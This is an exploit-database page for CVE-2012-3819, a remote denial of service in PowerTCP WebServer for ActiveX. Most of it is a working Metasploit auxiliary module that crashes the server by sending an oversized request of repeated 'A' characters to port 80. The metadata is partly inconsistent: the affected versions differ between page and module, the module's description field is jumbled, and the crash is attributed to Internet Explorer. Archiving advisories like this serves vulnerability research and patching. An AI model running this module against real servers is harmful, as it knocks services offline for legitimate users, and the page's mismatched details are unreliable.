header-logo
Suggest Exploit
vendor:
PowerTCP WebServer for ActiveX
by:
catatonicprime
7,5
CVSS
HIGH
Remote Denial of Service
399
CWE
Product Name: PowerTCP WebServer for ActiveX
Affected Version From: 1.9.2
Affected Version To: 1.9.2
Patch Exists: YES
Related CWE: CVE-2012-3819
CPE: a:dart_communications:powertcp_webserver_for_activex
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2012

PowerTCP WebServer for ActiveX Remote Denial of Service Vulnerability

PowerTCP WebServer for ActiveX is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to crash the application (typically Internet Explorer), denying service to legitimate users. PowerTCP WebServer for ActiveX 1.9.2 is vulnerable; other versions may also be affected.

Mitigation:

Upgrade to the latest version of PowerTCP WebServer for ActiveX
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/55761/info

PowerTCP WebServer for ActiveX is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue to crash the application (typically Internet Explorer), denying service to legitimate users.

PowerTCP WebServer for ActiveX 1.9.2 is vulnerable; other versions may also be affected. 

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos

def initialize(info = {})
    super(update_info(info,
        'Description' => %q{ 'Name' => 'Dart Webserver
<= 1.9.0 Stack Overflow',
        Dart Webserver from Dart Communications throws a stack
overflow exception
        when processing large requests.
    }
    ,
    'Author' => [
    'catatonicprime'
    ],
    'Version' => '$Revision: 15513 $',
    'License' => MSF_LICENSE,
    'References' => [
        [ 'CVE', '2012-3819' ],
        ],
    'DisclosureDate' => '9/28/2012'))

    register_options([
        Opt::RPORT(80),
        OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust',
'520000' ])
    ])
    end
    def run
        serverIP = datastore['RHOST']
        if (datastore['RPORT'].to_i != 80)
            serverIP += ":" + datastore['RPORT'].to_s
        end
        size = datastore['SIZE']

        print_status("Crashing the server ...")
        request = "A" * size + "\r\n\r\n"
        connect
        sock.put(request)
        disconnect

    end
end

Navigation

Suggest Exploit

Services By CQR